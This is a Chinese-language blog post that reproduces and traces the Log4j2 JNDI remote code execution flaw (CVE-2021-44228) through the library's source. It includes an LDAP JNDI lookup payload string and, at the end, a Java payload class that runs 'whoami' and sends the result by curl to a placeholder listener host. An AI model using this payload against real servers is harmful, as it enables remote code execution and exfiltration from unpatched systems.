目录

Log4j2 CVE-2021-44228 漏洞复现&分析

复现

一觉醒来,朋友圈和群像过年一样,一看原来是核弹漏洞 Log4j2 RCE 泄漏了,于是抽空做了漏洞复现和分析。

https://cdn.bingbingzi.cn/blog/20211211100401.png
Picture

分析

先到 Github 看看官方修复了什么,从修复的内容对比找到漏洞点。 链接

https://cdn.bingbingzi.cn/blog/20211211101651.png
Picture

经过一番搜寻,找到了一个看起来是判断是否允许使用 JDNI ,很有可能是这个lookup

https://cdn.bingbingzi.cn/blog/20211211101838.png
Picture

在官方网站上找到Lookup发现支持很多种格式:

格式 说明
ctx Context Map Lookup
docker Docker Lookup
env Environment Lookup
java Java Lookup
jndi Jndi Lookup
sys System Properties Lookup

https://cdn.bingbingzi.cn/blog/20211211123033.png
Picture

JndiLookup允许通过JNDI检索变量

1
2
3
4
5
<File name="Application" fileName="application.log">
  <PatternLayout>
    <pattern>%d %p %c{1.} [%t] $${jndi:logging/context-name} %m%n</pattern>
  </PatternLayout>
</File>

现在我以一个寻找 Log4j2 中 JNDI 漏洞的视角进行分析。

只要通过一个入口传入 ldap,让 JndiLookup 检索到,即可触发 RCE。那么就找呗,找到能触发JndiLookup的调用。

首先找到 JndiLookup.lookup

https://cdn.bingbingzi.cn/blog/20211211161203.png
Picture

继续跟进 Interpolator.lookup

https://cdn.bingbingzi.cn/blog/20211211152226.png
Picture

StrSubstituto.substitute 这是一个私有方法,需要找到一个公有的调用链。

https://cdn.bingbingzi.cn/blog/20211211152640.png
Picture

StrSubstituto里面找到 public 方法 raplace

https://cdn.bingbingzi.cn/blog/20211211153622.png
Picture

接着找到调用这个方法的地方:LoggerConfig.log ,注意到这个类有个构造方法:

1
config.getStrSubstitutor().replace(event, prop.getValue()) //
1
2
3
4
5
6
7
8
9
public LoggerConfig() {
        this.logEventFactory = LOG_EVENT_FACTORY;
        this.level = Level.ERROR;
        this.name = Strings.EMPTY;
        this.properties = null;
        this.propertiesRequireLookup = false;
        this.config = null;
        this.reliabilityStrategy = new DefaultReliabilityStrategy(this);
    }

跟进 DefaultReliabilityStrategy.log

https://cdn.bingbingzi.cn/blog/20211211154232.png
Picture

搜索reliabilityStrategy找到他的get方法,再搜索getReliabilityStrategy()找到Logger.logMessage

https://cdn.bingbingzi.cn/blog/20211211155115.png
Picture

找到logMessage的调用点,妈呀,这边太多调用了,搜索了一下发现一般都是通过:

1
private static Logger LOG = LogManager.getLogger(Log4j2Test.class);

这样来调用的。找到LogManager

https://cdn.bingbingzi.cn/blog/20211211160615.png
Picture

跟进 AbstractLogger.log

1
2
3
4
5
6
@Override
    public void log(final Level level, final Marker marker, final CharSequence message, final Throwable throwable) {
        if (isEnabled(level, marker, message, throwable)) {
            logMessage(FQCN, level, marker, message, throwable);
        }
    }

这边会进行一个判断,需要isEnabled(level, marker, message, throwable)返回True才能进行logMessage操作,继续跟进isEnabled发现是对传入参数的level进行检查。

到这里懒得找到哪配置 Level 了,直接将所有等级都测试一下子:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
    public static void main(String args[]) {
        Logger logger = LogManager.getLogger(Log4j2JNDI.class);
//        logger.error("${jndi:ldap://127.0.0.1:1389/RCE}");
        logger.info("info");
        logger.error("error");
        logger.debug("debug");
        logger.trace("trace");
        logger.fatal("fatel");
    }

/*
15:06:24.175 [main] ERROR Log4j2JNDI - error
15:06:24.177 [main] FATAL Log4j2JNDI - fatel
*/

也就是说默认情况下errorfatal都可以触发 Log4j2 的 RCE。

https://cdn.bingbingzi.cn/blog/20211211151100.png

带回显的利用方式

直接贴代码了,已经在 Github 上开源:https://github.com/binganao/Log4j2-RCE

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import java.io.InputStreamReader;
import java.io.LineNumberReader;

public class CommandExec {

    public CommandExec() {
        System.out.println("CommandExec Called!");
        try {
            String cmd = "whoami";
            String result = "";
            Process process = Runtime.getRuntime().exec(cmd);
            // 获得标准流上的输出
            InputStreamReader inputStreamReader = new InputStreamReader(process.getInputStream());
            LineNumberReader consoleInput = new LineNumberReader(inputStreamReader);
            String consoleInputLine;
            while ((consoleInputLine = consoleInput.readLine()) != null) {
                result += consoleInputLine;
            }
            java.lang.Runtime.getRuntime().exec("curl http://nc地址/" + result);
        } catch (Exception e) {
            System.out.println("Command Exec Failed!");
        }
    }
}